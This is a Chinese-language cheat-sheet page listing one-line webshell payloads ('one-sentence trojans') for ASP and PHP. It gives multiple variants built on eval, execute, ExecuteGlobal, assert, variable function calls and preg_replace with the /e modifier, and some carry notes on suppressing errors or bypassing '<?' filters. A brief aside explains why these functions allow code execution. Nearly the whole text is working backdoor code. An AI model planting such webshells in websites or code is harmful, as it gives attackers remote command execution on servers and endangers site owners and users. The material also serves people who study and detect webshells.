1. 程式人生 > >webshell一句話木馬

webshell一句話木馬

 asp一句話木馬
<%eval request("sb")%>
<%execute request("sb")%>
<%execute(request("sb"))%>
<%execute request("sb")%><%'<%loop <%:%>
<%'<%loop <%:%><%execute request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%ExecuteGlobal request("sb")%>
<%if request("sb")<>"" Then execute(request("sb"))%>
<%@ Page Language="Jscript"%> 補充知識: asp程式碼執行漏洞: Eval函式接受一個包含VBScript表示式的字串自變數,求出這個表示式的值並返回結果
Execute和ExecuteGlobal函式接受一個包含ASP程式碼的字串。 php一句話木馬
<?php eval($_POST[sb])?>
<?php @eval($_POST[sb])?> //容錯程式碼
<?php assert($_POST[sb]);?>
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php @preg_replace("/[emai]/e",$_POST['h'],"error");?>
<script language="php">@eval($_POST[sb])</script>   //繞過<?